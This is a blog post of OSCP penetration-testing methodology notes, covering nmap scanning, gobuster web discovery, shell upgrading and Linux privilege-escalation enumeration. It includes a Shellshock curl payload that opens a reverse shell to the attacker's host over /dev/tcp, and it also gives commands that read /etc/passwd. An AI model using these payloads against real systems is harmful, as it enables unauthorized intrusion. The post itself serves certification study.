[LeeCyberSec] OSCP Methodology
Bài đăng này đã không được cập nhật trong 3 năm
Lab Machines
https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0
References
https://oscp.infosecsanyam.in/one-page-methodology
https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
Scanning
Try to scan as normaly as possible!
Scanning script: https://github.com/superkojiman/onetwopunch
TCP Scan
ports=$(nmap -p- -T4 $ip | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//); echo $ports
UDP Scan
sudo nmap -sU -p- $ip
Services Scan
nmap -sC -sV -p$ports $ip
Web application
List URLs
curl http://$ip -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
Discovery files and directories
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/
Shellshock POC
gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/cgis.txt
gobuster dir -u http://$ip/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/ -x txt,sh,php,cgi -s '200,204,403,500'
https://github.com/mubix/shellshocker-pocs
curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.sh
LFI to RCE Exploit with Perl Script
https://www.exploit-db.com/papers/12992
Virtual hosting
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers).
Create passwd directory
cewl -m 5 http://$ip/joomla/ > passwd.txt
Upgrade shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
^Z
stty raw -echo
fg
export TERM=xterm
*nix Privilege Escalation
References
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://gtfobins.github.io/
LinEnum & unix-privesc-check
Information Gathering
- What's the OS? What version? What architecture?
cat /etc/*-release
uname -i
lsb_release -a (Debian based OSs)
- Who are we? Where are we?
id
pwd
- Who uses the box? What users? (And which ones have a valid shell)
cat /etc/passwd
grep -vE "nologin|false" /etc/passwd
- What's currently running on the box? What active network services are there?
ps aux
netstat -antup
- What's installed? What kernel is being used?
dpkg -l (Debian based OSs)
rpm -qa (CentOS / openSUSE )
uname -a
Windows Privilege Escalation
Update soon: https://leecybersec.gitbook.io/oscp/
All rights reserved